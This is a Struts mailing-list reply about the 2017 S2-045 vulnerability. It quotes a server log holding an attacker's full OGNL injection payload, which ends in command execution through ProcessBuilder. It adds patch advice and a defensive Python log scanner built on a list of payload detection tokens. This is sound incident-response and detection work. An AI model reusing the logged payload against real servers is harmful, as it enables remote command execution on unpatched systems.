Looking at my logs I can see some activity: GRRR :

179.253.10.27 - - [24/Mar/2017:08:39:13 +0000] "GET /notFound.action
HTTP/1.1" 404 2258 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"


2017-03-24 08:39:13,649 WARN
org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
JakartaMultiPartRequest:parse - Request exceeded size limit!
org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException:
the request doesn't contain a multipart/form-data or multipart/mixed
stream, content type header is %{(#nike='multipart/form-data'
).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_
memberAccess?(#_memberAccess=#dm):((#container=#context['
com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.
getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.
getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#cmd='nMaskCustomMuttMoloz').(#
iswin=(@java.lang.System@getProperty('os.name').
toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/
c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#
cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@
org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@
org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.
flush())}

On 16 March 2017 at 12:45, Martin Gainty <mgai...@hotmail.com> wrote:

>
>
>
>
> ________________________________
> From: Greg Huber <gregh3...@gmail.com>
> Sent: Thursday, March 16, 2017 5:19 AM
> To: Struts Developers List
> Subject: Re: S2 makes Hacker News :/
>
> Just because you are using s2, does not necessarily mean you are affected,
> all I get is a response :
>
> HTTP/1.1 404
> Content-Length: 0
> Date: Thu, 16 Mar 2017 09:02:54 GMT
> Connection: close
>
> Looking at my logs this fishing is going on all the time.
>
> MG>from what i read injections only happen with Content-Type injection
>
> MG>then again patches  Struts 2.3.32 or 2.5.10.1 has been available for
> some time
>
> MG>Johannes suggests implementing 'snort' to detect injection
> vulnerability reference link at sans.edu below:
> https://isc.sans.edu/forums/diary/Critical+Apache+Struts+
> 2+Vulnerability+Patch+Now/22169/
>
> MG>Thanks Lukasz!
>
> Thanks also Lukasz for the quick fix.
>
> Cheers Greg
>
>
>
>
> On 14 March 2017 at 18:17, Lukasz Lenart <lukaszlen...@apache.org> wrote:
>
> > 2017-03-14 15:57 GMT+01:00 Doug Erickson <erick...@part.net>:
> > > What is the proper server setup to prevent this?
> >
> > Upgrade to the latest Struts version ... and run server on a dedicated
> > account, block access to the world (sever should be only allowed to
> > connect to localhost) and few other things
> >
> >
> > Regards
> > --
> > Łukasz
> > + 48 606 323 122 http://www.lenart.org.pl/
> Łukasz Lenart - home page<http://www.lenart.org.pl/>
> www.lenart.org.pl
> passion: always something new. programming and creating are a life-long passion for me;
> so far I have managed to combine what I like with what I am paid for, and ...
>
>
>
> >
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: dev-unsubscr...@struts.apache.org
> > For additional commands, e-mail: dev-h...@struts.apache.org
> >
> >
>

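As an added example (not code from any participant in this thread or from the Struts project), here is a small Python scanner for WARN entries of the kind shown at the top of this mail: it pulls out the Content-Type value that the JakartaMultiPartRequest parser logged and flags it when it starts with an OGNL expression marker or contains the S2-045 payload tokens visible in that log. The sample log lines are constructed after the entry above, with the payload shortened; the regex, token list and function names are my own.

```python
import re
from dataclasses import dataclass

# Constructed sample log lines, shaped after the Struts WARN entry quoted in the thread.
# Line 1: a shortened copy of the OGNL payload from that log (S2-045 shape).
# Line 2: the same exception for a benign, non-multipart Content-Type.
# Line 3: an unrelated INFO line that the scanner must ignore.
SAMPLE_LOG = """\
2017-03-24 08:39:13,649 WARN org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest JakartaMultiPartRequest:parse - Request exceeded size limit! org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):(#context.setMemberAccess(#dm))).(#cmd='nMaskCustomMuttMoloz')}
2017-03-24 09:02:54,110 WARN org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest JakartaMultiPartRequest:parse - Request exceeded size limit! org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is application/x-www-form-urlencoded
2017-03-24 09:05:01,003 INFO  com.example.app.LoginAction - user login ok
"""

# Matches the log4j-style prefix and captures everything after the
# "content type header is" phrase that the multipart parser emits.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) "
    r"(?P<level>[A-Z]+)\s+(?P<logger>\S+).*?"
    r"content type header is (?P<ctype>.*)$"
)

# A legitimate Content-Type never begins with an OGNL expression delimiter.
OGNL_MARKERS = ("%{", "${")

# Tokens present in the payload logged above; any one of them in a
# Content-Type value is a strong indicator of an S2-045 attempt.
S2045_TOKENS = (
    "#_memberAccess",
    "ognl.OgnlContext",
    "OgnlUtil",
    "setMemberAccess",
    "ProcessBuilder",
)


@dataclass(frozen=True)
class Finding:
    timestamp: str
    content_type: str   # truncated copy of the offending header value
    matched: tuple      # which indicators fired


def parse_struts_warn(line: str):
    """Return the captured fields for a multipart-parser WARN line, else None."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify_content_type(ctype: str) -> list:
    """List the indicators that fire for one Content-Type value (empty = benign)."""
    matched = []
    if ctype.lstrip().startswith(OGNL_MARKERS):
        matched.append("ognl-expression-start")
    matched.extend(tok for tok in S2045_TOKENS if tok in ctype)
    return matched


def scan(log_text: str) -> list:
    """Scan a log blob and return one Finding per suspicious Content-Type."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_struts_warn(line)
        if rec is None:
            continue
        matched = classify_content_type(rec["ctype"])
        if matched:
            findings.append(Finding(rec["ts"], rec["ctype"][:60], tuple(matched)))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.timestamp, f.matched, f.content_type)
```

Note that this WARN line only exists because the unpatched multipart parser tried to interpret the header; a server on 2.3.32 / 2.5.10.1, like Greg's, answers 404 without reaching that code path, so on patched hosts the access log (the `GET /notFound.action` line above) is the place to look for the same probes.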